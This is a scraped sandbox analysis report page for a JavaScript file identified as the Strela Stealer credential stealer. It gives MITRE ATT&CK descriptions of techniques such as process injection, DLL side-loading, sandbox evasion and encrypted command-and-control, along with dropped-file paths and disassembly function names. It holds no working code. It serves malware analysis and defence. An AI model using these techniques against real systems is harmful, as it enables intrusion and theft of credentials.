Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1239840531439025921.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Strela Stealer

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnffw4rs.104.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjllnkuc.i0s.ps1

C:\Users\user\astonishinglewdselective

C:\Users\user\mindtrembleopen.bat

C:\Users\user\mindtrembleopen.bat:Zone.Identifier

C:\Users\user\muddledfreedesert.ico

Static File Info

General

File Icon

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
1239840531439025921.js

Function 02486908 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00007FFE102314B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40
libraryloaderCOMMON

Function 02483A50 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463
COMMON

Function 00007FFE1023A8A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183
COMMON

Function 00007FFE1023B9B0 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Function 00007FFE1023BA30 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Function 024842D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201
COMMON

Function 02482690 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233
COMMON

Function 02483F20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
COMMON